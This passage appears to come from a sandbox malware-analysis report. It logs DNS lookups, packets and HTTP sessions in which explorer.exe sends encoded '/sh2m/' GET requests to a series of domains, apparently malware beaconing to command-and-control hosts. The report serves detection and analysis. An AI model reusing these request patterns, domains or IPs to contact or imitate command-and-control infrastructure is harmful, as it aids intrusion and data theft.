Jun 11, 2021 09:02:57.445660114 CEST | 49738 | 80 | 192.168.2.3 | 104.21.89.72
Jun 11, 2021 09:02:57.445765972 CEST | 49738 | 80 | 192.168.2.3 | 104.21.89.72
Jun 11, 2021 09:02:57.446099997 CEST | 80 | 49738 | 104.21.89.72 | 192.168.2.3
Jun 11, 2021 09:02:57.446647882 CEST | 49738 | 80 | 192.168.2.3 | 104.21.89.72
Jun 11, 2021 09:03:07.750242949 CEST | 49739 | 80 | 192.168.2.3 | 3.143.65.214
Jun 11, 2021 09:03:07.889324903 CEST | 80 | 49739 | 3.143.65.214 | 192.168.2.3
Jun 11, 2021 09:03:07.889559984 CEST | 49739 | 80 | 192.168.2.3 | 3.143.65.214
Jun 11, 2021 09:03:07.889676094 CEST | 49739 | 80 | 192.168.2.3 | 3.143.65.214
Jun 11, 2021 09:03:08.029758930 CEST | 80 | 49739 | 3.143.65.214 | 192.168.2.3
Jun 11, 2021 09:03:08.030723095 CEST | 80 | 49739 | 3.143.65.214 | 192.168.2.3
Jun 11, 2021 09:03:08.030756950 CEST | 80 | 49739 | 3.143.65.214 | 192.168.2.3
Jun 11, 2021 09:03:08.030939102 CEST | 49739 | 80 | 192.168.2.3 | 3.143.65.214
Jun 11, 2021 09:03:08.030992031 CEST | 49739 | 80 | 192.168.2.3 | 3.143.65.214
Jun 11, 2021 09:03:08.170012951 CEST | 80 | 49739 | 3.143.65.214 | 192.168.2.3
Jun 11, 2021 09:03:13.403656006 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:13.687568903 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.687798023 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:13.687930107 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:13.971976995 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974311113 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974340916 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974369049 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974395990 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974432945 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974466085 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974493027 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974515915 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974529028 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:13.974536896 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974558115 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:13.974617958 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:13.974641085 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:14.184293985 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:14.258330107 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:14.258363008 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:14.258522034 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:14.260162115 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:14.468169928 CEST | 80 | 49742 | 3.34.12.41 | 192.168.2.3
Jun 11, 2021 09:03:14.468321085 CEST | 49742 | 80 | 192.168.2.3 | 3.34.12.41
Jun 11, 2021 09:03:19.269589901 CEST | 49744 | 80 | 192.168.2.3 | 107.180.57.111
Jun 11, 2021 09:03:19.407282114 CEST | 80 | 49744 | 107.180.57.111 | 192.168.2.3
Jun 11, 2021 09:03:19.407416105 CEST | 49744 | 80 | 192.168.2.3 | 107.180.57.111
Jun 11, 2021 09:03:19.407633066 CEST | 49744 | 80 | 192.168.2.3 | 107.180.57.111
Jun 11, 2021 09:03:19.545063972 CEST | 80 | 49744 | 107.180.57.111 | 192.168.2.3
Jun 11, 2021 09:03:19.565264940 CEST | 80 | 49744 | 107.180.57.111 | 192.168.2.3
Jun 11, 2021 09:03:19.565289974 CEST | 80 | 49744 | 107.180.57.111 | 192.168.2.3
Jun 11, 2021 09:03:19.565665007 CEST | 49744 | 80 | 192.168.2.3 | 107.180.57.111
Jun 11, 2021 09:03:19.565691948 CEST | 49744 | 80 | 192.168.2.3 | 107.180.57.111
Jun 11, 2021 09:03:19.703018904 CEST | 80 | 49744 | 107.180.57.111 | 192.168.2.3
Jun 11, 2021 09:03:24.680736065 CEST | 49750 | 80 | 192.168.2.3 | 45.195.169.197
Jun 11, 2021 09:03:24.978627920 CEST | 80 | 49750 | 45.195.169.197 | 192.168.2.3
Jun 11, 2021 09:03:24.978780985 CEST | 49750 | 80 | 192.168.2.3 | 45.195.169.197
Jun 11, 2021 09:03:24.978941917 CEST | 49750 | 80 | 192.168.2.3 | 45.195.169.197
Jun 11, 2021 09:03:25.279150009 CEST | 80 | 49750 | 45.195.169.197 | 192.168.2.3
Jun 11, 2021 09:03:25.300106049 CEST | 80 | 49750 | 45.195.169.197 | 192.168.2.3
Jun 11, 2021 09:03:25.303200006 CEST | 49750 | 80 | 192.168.2.3 | 45.195.169.197
Jun 11, 2021 09:03:25.303299904 CEST | 49750 | 80 | 192.168.2.3 | 45.195.169.197
Jun 11, 2021 09:03:25.601140022 CEST | 80 | 49750 | 45.195.169.197 | 192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 11, 2021 09:01:24.338618040 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:24.388590097 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:25.109719992 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:25.159903049 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:25.868381023 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:25.928971052 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:26.775058985 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:26.836594105 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:27.662250042 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:27.712810040 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:29.945643902 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:29.998943090 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:30.741817951 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:30.794975996 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:31.693821907 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:31.746817112 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:32.646459103 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:32.697186947 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:33.586540937 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:33.637125015 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:34.512847900 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:34.563277960 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:36.274436951 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:36.324868917 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:37.277277946 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:37.328092098 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:38.387057066 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:38.437036991 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:39.302576065 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:39.353017092 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:41.782471895 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:41.832535028 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:42.950047016 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:42.999986887 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:55.359546900 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:55.421055079 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:01:57.091483116 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:01:57.154541016 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:02:19.304805040 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:02:19.366297960 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:02:21.579060078 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:02:21.639075041 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:02:33.908291101 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:02:33.982995987 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:02:35.988408089 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:02:36.054531097 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:02:39.732753038 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:02:39.795432091 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:02:46.233736038 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:02:46.329618931 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:02:51.466469049 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:02:51.529956102 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:02:56.938940048 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:02:57.016514063 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:07.589299917 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:07.749241114 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:09.582503080 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:09.659336090 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:13.048239946 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:13.402180910 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:18.792134047 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:18.860271931 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:19.203794003 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:19.267663002 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:20.455569029 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:20.517663002 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:24.607898951 CEST | 56130 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:24.679627895 CEST | 53 | 56130 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:30.319385052 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:31.326244116 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:32.326234102 CEST | 56338 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:32.392487049 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:33.390429974 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:34.391613007 CEST | 53 | 56338 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:37.406413078 CEST | 59420 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:37.484054089 CEST | 53 | 59420 | 8.8.8.8 | 192.168.2.3
Jun 11, 2021 09:03:42.657643080 CEST | 58784 | 53 | 192.168.2.3 | 8.8.8.8
Jun 11, 2021 09:03:42.844861031 CEST | 53 | 58784 | 8.8.8.8 | 192.168.2.3

ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Jun 11, 2021 09:03:33.391097069 CEST | 192.168.2.3 | 8.8.8.8 | cff1 | (Port unreachable) | Destination Unreachable
Jun 11, 2021 09:03:34.391709089 CEST | 192.168.2.3 | 8.8.8.8 | cff1 | (Port unreachable) | Destination Unreachable

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jun 11, 2021 09:02:35.988408089 CEST | 192.168.2.3 | 8.8.8.8 | 0x79f9 | Standard query (0) | www.take-me-bergen.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:46.233736038 CEST | 192.168.2.3 | 8.8.8.8 | 0x62a3 | Standard query (0) | www.starflexacademy.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:51.466469049 CEST | 192.168.2.3 | 8.8.8.8 | 0x1ff4 | Standard query (0) | www.ladorreguita.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:56.938940048 CEST | 192.168.2.3 | 8.8.8.8 | 0x42e2 | Standard query (0) | www.candydulce.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:07.589299917 CEST | 192.168.2.3 | 8.8.8.8 | 0xa4cc | Standard query (0) | www.insurancedowntown.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:13.048239946 CEST | 192.168.2.3 | 8.8.8.8 | 0xc68e | Standard query (0) | www.ezonkorea.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:19.203794003 CEST | 192.168.2.3 | 8.8.8.8 | 0x87aa | Standard query (0) | www.dndemystified.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:24.607898951 CEST | 192.168.2.3 | 8.8.8.8 | 0x49da | Standard query (0) | www.meganfantastic.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:30.319385052 CEST | 192.168.2.3 | 8.8.8.8 | 0x5849 | Standard query (0) | www.obi4ex.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:31.326244116 CEST | 192.168.2.3 | 8.8.8.8 | 0x5849 | Standard query (0) | www.obi4ex.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:32.326234102 CEST | 192.168.2.3 | 8.8.8.8 | 0x5849 | Standard query (0) | www.obi4ex.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:37.406413078 CEST | 192.168.2.3 | 8.8.8.8 | 0xbd04 | Standard query (0) | www.sciencebasedmasks.com | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:42.657643080 CEST | 192.168.2.3 | 8.8.8.8 | 0x9fb3 | Standard query (0) | www.baliholisticacademy.com | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jun 11, 2021 09:02:36.054531097 CEST | 8.8.8.8 | 192.168.2.3 | 0x79f9 | No error (0) | www.take-me-bergen.com | | 172.67.206.33 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:36.054531097 CEST | 8.8.8.8 | 192.168.2.3 | 0x79f9 | No error (0) | www.take-me-bergen.com | | 104.21.37.82 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:46.329618931 CEST | 8.8.8.8 | 192.168.2.3 | 0x62a3 | No error (0) | www.starflexacademy.com | www-starflexacademy-com.rentcafecn.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 09:02:46.329618931 CEST | 8.8.8.8 | 192.168.2.3 | 0x62a3 | No error (0) | www-starflexacademy-com.rentcafecn.com | www.rentcafecloudflaremvccn.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 09:02:46.329618931 CEST | 8.8.8.8 | 192.168.2.3 | 0x62a3 | No error (0) | www.rentcafecloudflaremvccn.com | | 104.18.193.20 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:46.329618931 CEST | 8.8.8.8 | 192.168.2.3 | 0x62a3 | No error (0) | www.rentcafecloudflaremvccn.com | | 104.18.194.20 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:51.529956102 CEST | 8.8.8.8 | 192.168.2.3 | 0x1ff4 | No error (0) | www.ladorreguita.com | | 173.234.255.253 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:57.016514063 CEST | 8.8.8.8 | 192.168.2.3 | 0x42e2 | No error (0) | www.candydulce.com | | 104.21.89.72 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:02:57.016514063 CEST | 8.8.8.8 | 192.168.2.3 | 0x42e2 | No error (0) | www.candydulce.com | | 172.67.156.242 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:07.749241114 CEST | 8.8.8.8 | 192.168.2.3 | 0xa4cc | No error (0) | www.insurancedowntown.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 09:03:07.749241114 CEST | 8.8.8.8 | 192.168.2.3 | 0xa4cc | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.143.65.214 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:07.749241114 CEST | 8.8.8.8 | 192.168.2.3 | 0xa4cc | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 13.59.53.244 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:07.749241114 CEST | 8.8.8.8 | 192.168.2.3 | 0xa4cc | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 52.14.32.15 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:13.402180910 CEST | 8.8.8.8 | 192.168.2.3 | 0xc68e | No error (0) | www.ezonkorea.com | | 3.34.12.41 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:19.267663002 CEST | 8.8.8.8 | 192.168.2.3 | 0x87aa | No error (0) | www.dndemystified.com | dndemystified.com | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 09:03:19.267663002 CEST | 8.8.8.8 | 192.168.2.3 | 0x87aa | No error (0) | dndemystified.com | | 107.180.57.111 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:24.679627895 CEST | 8.8.8.8 | 192.168.2.3 | 0x49da | No error (0) | www.meganfantastic.com | | 45.195.169.197 | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:32.392487049 CEST | 8.8.8.8 | 192.168.2.3 | 0x5849 | Server failure (2) | www.obi4ex.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:33.390429974 CEST | 8.8.8.8 | 192.168.2.3 | 0x5849 | Server failure (2) | www.obi4ex.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:34.391613007 CEST | 8.8.8.8 | 192.168.2.3 | 0x5849 | Server failure (2) | www.obi4ex.com | none | none | A (IP address) | IN (0x0001)
Jun 11, 2021 09:03:37.484054089 CEST | 8.8.8.8 | 192.168.2.3 | 0xbd04 | No error (0) | www.sciencebasedmasks.com | www.sciencebasedmasks.com.cdn.cloudflare.net | | CNAME (Canonical name) | IN (0x0001)
Jun 11, 2021 09:03:42.844861031 CEST | 8.8.8.8 | 192.168.2.3 | 0x9fb3 | No error (0) | www.baliholisticacademy.com | | 192.185.0.218 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• www.take-me-bergen.com
• www.starflexacademy.com
• www.ladorreguita.com
• www.candydulce.com
• www.insurancedowntown.com
• www.ezonkorea.com
• www.dndemystified.com
• www.meganfantastic.com

                                                                                                      HTTP Packets

                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      0192.168.2.349730172.67.206.3380C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:36.107449055 CEST564OUTGET /sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.take-me-bergen.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:36.198753119 CEST565INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Fri, 11 Jun 2021 07:02:36 GMT
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=3600
                                                                                                      Expires: Fri, 11 Jun 2021 08:02:36 GMT
                                                                                                      Location: https://www.take-me-bergen.com/sh2m/?i0=Y4nA7D8ZanudJV/n7ckHSBWOhW22WEJR/asQiGNTmjaNDyrYZ8Q/zKqiBMBjk5weHegN&4huxZr=02MtK8MPsR3L
                                                                                                      cf-request-id: 0a9b7a4b6f00004e86649e6000000001
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=uZ7PdS8U42szUs6C995EPraRtYy8Z3heGDXHo52srsFgAOnHMVc1HK%2B33rG%2BJTIScJ5dUmsF%2FDV7BlHuDeG3FVgn0V3QRqxPm9ZPQBu8%2FJfPGZBjbl7E0sLXjgXuvNuIQbPRYA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 65d8f98bef064e86-FRA
                                                                                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      1192.168.2.349736104.18.193.2080C:\Windows\explorer.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      Jun 11, 2021 09:02:46.375958920 CEST4569OUTGET /sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L HTTP/1.1
                                                                                                      Host: www.starflexacademy.com
                                                                                                      Connection: close
                                                                                                      Data Raw: 00 00 00 00 00 00 00
                                                                                                      Data Ascii:
                                                                                                      Jun 11, 2021 09:02:46.430977106 CEST4570INHTTP/1.1 301 Moved Permanently
                                                                                                      Date: Fri, 11 Jun 2021 07:02:46 GMT
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=3600
                                                                                                      Expires: Fri, 11 Jun 2021 08:02:46 GMT
                                                                                                      Location: https://www.starflexacademy.com/sh2m/?i0=CQ6AMTNmXrT6GsHyvLqygrxreupfdtmN+4T1XtvAXMgditzRj6Y1Xuw537ryrSqhWitY&4huxZr=02MtK8MPsR3L
                                                                                                      cf-request-id: 0a9b7a7388000006292d0a2000000001
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 65d8f9cc0aa40629-FRA
                                                                                                      Data Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


Session ID: 2 | Source IP: 192.168.2.3 | Source Port: 49737 | Destination IP: 173.234.255.253 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Jun 11, 2021 09:02:51.728471041 CEST | kBytes transferred: 4571 | Direction: OUT | Data: GET /sh2m/?i0=AN9Dli3eSwBxhLN7Z92H8FzDOGpUzm7G3BkkvfgYwC6zoN6kwH9F+lw53Jt7Bui6OWXD&4huxZr=02MtK8MPsR3L HTTP/1.1
Host: www.ladorreguita.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 11, 2021 09:02:51.927200079 CEST | kBytes transferred: 4571 | Direction: IN | Data: HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
Server: Nginx Microsoft-HTTPAPI/2.0
X-Powered-By: Nginx
Date: Fri, 11 Jun 2021 07:02:57 GMT
Connection: close
Data Raw: 33 0d 0a ef bb bf 0d 0a
Data Ascii: 3


Session ID: 3 | Source IP: 192.168.2.3 | Source Port: 49738 | Destination IP: 104.21.89.72 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Jun 11, 2021 09:02:57.061425924 CEST | kBytes transferred: 4576 | Direction: OUT | Data: GET /sh2m/?i0=Qqwfsv61LD8gOSv2HQNs13/ILT3hkPAGuV1QQZOHa/kG/rdN/rA5QVkGcwq5olxFBDS9&4huxZr=02MtK8MPsR3L HTTP/1.1
Host: www.candydulce.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 11, 2021 09:02:57.445303917 CEST | kBytes transferred: 4578 | Direction: IN | Data: HTTP/1.1 508 Loop Detected
Date: Fri, 11 Jun 2021 07:02:57 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Retry-After: 14400
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
Referrer-Policy: no-referrer-when-downgrade
CF-Cache-Status: DYNAMIC
cf-request-id: 0a9b7a9d4700004a56888ee000000001
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=X84uMHwcaOhnSaqO3QxevRGwyYRAADiM%2Fy3AJfFNjvSLLMCTJF%2BkAoJc66bHNiit0ArF6PoXjGYjdMYPlVrQyVbiaPMUJBrHCgmu2owzAO9P3l1UkID7qT6vkObWdgmH"}],"group":"cf-nel","max_age":604800}
NEL: {"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 65d8fa0ed8994a56-FRA
alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
Data Ascii: 326<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><HTML><HEAD><TITLE> 508 Resource Limit Is Reached</TITLE><script async src='/cdn-cgi/bm/cv/669835187/api.js'></script></HEAD><BODY><H1>Resource Limit Is Reached</H1>The website is temporarily unable to service your request as it exceeded resource limit.Please try again later.<script type="text/javascript">(function(){window['__CF$cv$params']={r:'65d8fa0ed8994a56',m:'de33b67e4d43557bad639485462fa97f2c598788-1623394977-1800-AfTzjxP7JiD43DZqooRLrlU5HwY


Session ID: 4 | Source IP: 192.168.2.3 | Source Port: 49739 | Destination IP: 3.143.65.214 | Destination Port: 80 | Process: C:\Windows\explorer.exe
Timestamp: Jun 11, 2021 09:03:07.889676094 CEST | kBytes transferred: 4580 | Direction: OUT | Data: GET /sh2m/?i0=c9aUCvLa9Ql2a6xFKe5xJWdXulTfAnmJmW0relGKzVi+CMwVFA49Zy8Fshmf8yObHaZC&4huxZr=02MtK8MPsR3L HTTP/1.1
Host: www.insurancedowntown.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Timestamp: Jun 11, 2021 09:03:08.030723095 CEST | kBytes transferred: 4580 | Direction: IN | Data: HTTP/1.1 404 Not Found
Date: Fri, 11 Jun 2021 07:03:07 GMT
Content-Type: text/html
Content-Length: 153
Connection: close
Server: nginx/1.16.1
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


Session ID: 5 | Source IP: 192.168.2.3 | Source Port: 49742 | Destination IP: 3.34.12.41 | Destination Port: 80 | Process: C:\Windows\explorer.exe
